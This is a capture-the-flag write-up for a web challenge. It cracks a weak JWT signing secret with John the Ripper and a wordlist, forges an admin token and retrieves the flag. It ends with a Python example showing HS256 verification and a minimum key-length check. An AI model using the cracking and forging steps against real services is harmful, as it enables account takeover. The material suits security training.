JaWT Scratchpad
The homepage asks us to register with a name.
Using "admin" results in:
YOU CANNOT LOGIN AS THE ADMIN! HE IS SPECIAL AND YOU ARE NOT.
Any other name logs us in and stores a JWT in a cookie. Decoding it gives:
{
  "typ": "JWT",
  "alg": "HS256"
}
{
  "user": "john"
}
The text on the page links to JohnTheRipper:
Register with your name!
You can use your name as a log in, because that's quick and easy to remember! If you don't like your name, use a short and cool one like John!
Running that tool against the token:
run $ echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiam9obiJ9._fAF3H23ckP4QtF1Po3epuZWxmbwpI8Q26hRPDTh32Y" > jwt.txt
run $ ./john jwt.txt --format=HMAC-SHA256 --wordlist=/home/harshit/Downloads/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
ilovepico (?)
1g 0:00:00:02 DONE (2025-09-13 15:49) 0.4310g/s 3188Kp/s 3188Kc/s 3188KC/s iluve$..ilovemymother89
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
So the signing secret is ilovepico.
Using this secret and the payload {"user": "admin"}, create a new JWT. Replace the cookie value with it; reloading the page now displays the flag!
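
Why the cracking step works, as an added example that is not part of the original write-up: an HS256 signature is plain HMAC-SHA256 over `header.payload`, so anyone who guesses the key can validate a token offline. The sketch checks the write-up's token against the recovered key and shows an issuer that refuses keys under 32 bytes (the RFC 7518 minimum for HS256); `verify_hs256`, `issue_hs256` and `MIN_KEY_BYTES` are names chosen here.

```python
import base64, hashlib, hmac, json, secrets
from typing import Optional

MIN_KEY_BYTES = 32  # RFC 7518 s3.2: an HS256 key must be at least 256 bits

# Token and cracked key copied from the write-up above.
PAGE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
              "eyJ1c2VyIjoiam9obiJ9._fAF3H23ckP4QtF1Po3epuZWxmbwpI8Q26hRPDTh32Y")
PAGE_KEY = b"ilovepico"

def _b64d(part: str) -> bytes:
    # JWT uses unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _mac(key: bytes, signing_input: str) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the payload if token is a valid HS256 JWT under key, else None."""
    try:
        head, body, sig = token.split(".")
        header, payload = json.loads(_b64d(head)), json.loads(_b64d(body))
        good = hmac.compare_digest(_mac(key, head + "." + body), _b64d(sig))
    except ValueError:  # wrong part count, bad base64, bad JSON
        return None
    # Pin the algorithm server-side instead of trusting the header's choice.
    if not good or not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    return payload

def issue_hs256(payload: dict, key: bytes) -> str:
    """Sign payload, refusing keys short enough to be guessed offline."""
    if len(key) < MIN_KEY_BYTES:
        raise ValueError("HS256 key shorter than %d bytes" % MIN_KEY_BYTES)
    head = _b64e(json.dumps({"typ": "JWT", "alg": "HS256"}).encode())
    body = _b64e(json.dumps(payload).encode())
    return head + "." + body + "." + _b64e(_mac(key, head + "." + body))

if __name__ == "__main__":
    print(verify_hs256(PAGE_TOKEN, PAGE_KEY))     # the 9-byte key validates the token
    strong = secrets.token_bytes(MIN_KEY_BYTES)   # 256 random bits, not a word
    print(verify_hs256(issue_hs256({"user": "john"}, strong), strong))
```

A key drawn from `secrets.token_bytes(32)` does not appear in any wordlist, which is what makes the dictionary run shown above fail against a properly configured service.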